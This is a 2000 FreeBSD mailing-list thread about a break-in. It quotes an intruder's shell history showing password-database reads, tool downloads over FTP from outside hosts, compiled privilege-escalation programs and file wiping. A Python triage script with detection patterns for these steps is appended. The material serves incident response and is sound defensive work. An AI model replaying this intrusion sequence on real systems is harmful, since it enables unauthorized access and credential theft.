From owner-freebsd-questions Mon Dec 18 13:14:42 2000
From owner-freebsd-questions@FreeBSD.ORG Mon Dec 18 13:14:36 2000
Return-Path:
Delivered-To: freebsd-questions@freebsd.org
Received: from borg.starbase.net (unknown [208.233.101.2]) by hub.freebsd.org (Postfix) with ESMTP id 3379D37B69C for ; Mon, 18 Dec 2000 13:14:34 -0800 (PST)
Received: from localhost (alex@localhost) by borg.starbase.net (8.9.3/8.8.8) with ESMTP id QAA23756; Mon, 18 Dec 2000 16:14:21 -0500 (EST)
Date: Mon, 18 Dec 2000 16:14:20 -0500 (EST)
From: Alexander V P
X-Sender: alex@borg.starbase.net
To: Joe Oliveiro
Cc: "Gerald T. Freymann" , Questions
Subject: Re: Hacker history file - OUCH
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-questions@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.ORG

hi,
nothing wrong with that as far as I'm concerned. We (the FreeBSD community)
don't have that many break-ins, and every one needs to be investigated.
Personally I would do that and post the results somewhere, so that tomorrow's
(less experienced, less fortunate, etc.) admins can read about it. After all,
I'll wipe that box anyway ;-).
It takes lots of guts to post something like this on the FreeBSD mailing list
(or anywhere, for that matter).

alex

On Mon, 18 Dec 2000, Joe Oliveiro wrote:

> i like wiping the box!
>
> Microsoft: "Where would you like to go to today"
> Linux: "Where would you like to go tomorrow"
> FreeBSD: "Hey, when are you guys going to catch up"
>
>
> On Mon, 18 Dec 2000, Alexander V P wrote:
>
> > hi,
> > do you keep/have logs about what ftp transfers he did?
> > did you send mail to root@he.net, or the .mx domain?
> > any idea how he broke in? what FreeBSD are you using?
> > if I were in your place, I'd unplug the box and try to find out more about
> > this. don't do what most sysadmins do and just wipe the box.
> > alex
> >
> > On Mon, 18 Dec 2000, Gerald T. Freymann wrote:
> >
> > > Seems we have an intruder on one of our boxes... the .history file from the
> > > troubled account follows:
> > >
> > > cd bnc
> > > ls
> > > ./bash
> > > who
> > > cd /etc
> > > more passwd
> > > ps -l
> > > ls -l
> > > more pwd.db
> > > more hosts
> > > pico adduser.conf.bak
> > > pico group
> > > su user
> > > pico group.bak
> > > pico ftpuser
> > > O
> > > pico ftpusers
> > > su toor
> > > su operator
> > > id
> > > pico spwd.db
> > > su wheel
> > > pico passwd
> > > cd /var/tmp
> > > ls -a
> > > cd ...
> > > ls -a
> > > cd ..
> > > ls -l
> > > ls -al
> > > cd ...
> > > ftp copper.he.net
> > > chmod u+x xcon
> > > ./xcon
> > > id
> > > rm *
> > > ls
> > > who
> > > cd /var/tmp
> > > ls -a
> > > ls -al
> > > cd ...
> > > ls -a
> > > ftp cih.edu.mx
> > > ls
> > > cc bsd1 bsd-cron.c
> > > cc -o bsd1 bsd-cron.c
> > > ./bsd1
> > > id
> > > cc -o bsd2 bsd2.c
> > > ./bsd2
> > > id
> > > ls
> > > ftp cih.edu.mx
> > > ./bsd sh
> > > ./bsd.sh
> > > chmod u+x bsd.sh
> > > ./bsd.sh
> > > /tmp/sh
> > > id
> > > ls
> > > cc -o bsdsmail bsdsmail.c
> > > ./bsdsmail
> > > ls -a
> > > pico hack
> > > ls
> > > pico user.inf
> > > ls
> > > id
> > > rm *
> > > exit
> > >
> > > Anybody recognize what the intruder has set up?
> > >
> > > -Gerry
> > >
> > > To Unsubscribe: send mail to majordomo@FreeBSD.org
> > > with "unsubscribe freebsd-questions" in the body of the message
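Gerry asks what the intruder set up, and Alex's checklist (which FTP transfers happened, whom to notify, what got built) can be pulled out of the history file mechanically. The following Python is an added example, not part of the thread: it triages a shell history the way a responder would, grouping commands into categories and extracting the remote hosts and compiled binaries to follow up on. The category names and regexes are my own assumptions, and the sample input is a constructed subset of the lines Gerry posted.

```python
import re
from collections import defaultdict
# Constructed sample: a subset of the .history lines Gerry quoted.
SAMPLE_HISTORY = """\
cd /etc
more passwd
more pwd.db
pico spwd.db
su toor
su operator
cd ...
ftp copper.he.net
./xcon
rm *
ftp cih.edu.mx
cc -o bsd1 bsd-cron.c
./bsd1
cc -o bsdsmail bsdsmail.c
./bsdsmail
rm *
"""
# Triage rules; category names and patterns are mine, not from the thread.
RULES = {
    "auth_db_access": r"^(more|cat|pico|vi)\s+(/etc/)?((master\.)?passwd|s?pwd\.db|group|ftpusers)\b",
    "su_attempt": r"^su\b",
    "remote_transfer": r"^ftp\s+(\S+)",
    "hidden_dir": r"^cd\s+(\.{3,}|\.[A-Za-z0-9_]+)",  # "cd ..." or "cd .x", not "cd .."
    "compile": r"^(cc|gcc)\b.*-o\s+(\S+)",
    "run_local": r"^\./(\S+)",
    "anti_forensics": r"^rm\s+(\*|-rf\b)",
}
COMPILED = {cat: re.compile(rx) for cat, rx in RULES.items()}

def triage(history):
    # Map each category to the (line_no, command) pairs that matched it.
    hits = defaultdict(list)
    for n, raw in enumerate(history.splitlines(), 1):
        cmd = raw.strip()
        for cat, rx in COMPILED.items():
            if rx.match(cmd):
                hits[cat].append((n, cmd))
    return hits

def remote_hosts(hits):
    # Hosts the tooling was fetched from: whose abuse contacts to notify.
    return sorted({cmd.split()[1] for _, cmd in hits.get("remote_transfer", [])})

def staged_binaries(hits):
    # Output name of every compile: what to look for on disk and in cron.
    return sorted({COMPILED["compile"].match(cmd).group(2) for _, cmd in hits.get("compile", [])})
```

Run it over the real `.history` of the compromised account (and the FTP server logs for the listed hosts) before wiping the box, so the findings survive the rebuild.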